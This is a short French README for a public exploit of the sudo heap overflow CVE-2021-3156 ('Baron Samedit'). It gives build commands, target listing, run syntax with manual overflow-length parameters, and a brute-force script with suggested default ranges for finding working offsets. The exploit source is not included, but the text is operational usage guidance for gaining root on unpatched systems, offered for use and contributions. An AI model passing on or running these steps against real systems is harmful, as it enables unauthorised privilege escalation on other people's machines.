
Ceci est un exploit pour la vulnérabilité sudo CVE-2021-3156 (surnommée Baron Samedit par Qualys).
compilation :
$ make
liste des cibles :
$ ./sudo-hax-me-a-sandwich
exécution :
$ ./sudo-hax-me-a-sandwich <target_number>
mode manuel :
$ ./sudo-hax-me-a-sandwich <smash_len_a> <smash_len_b> <null_stomp_len> <lc_all_len>
Assurez-vous d'avoir GNU parallel installé.
$ make brute
$ ./brute.sh <smash_start> <smash_end> <null_start> <null_end> <lc_start> <lc_end>
quelques valeurs par défaut à essayer :
$ ./brute.sh 90 120 50 70 150 300
Cela dévorera tous les cœurs disponibles. N'essayez pas de faire du netflix & brute.
Envoyez des PR (raisonnables), je pourrais les fusionner.
Quelques idées :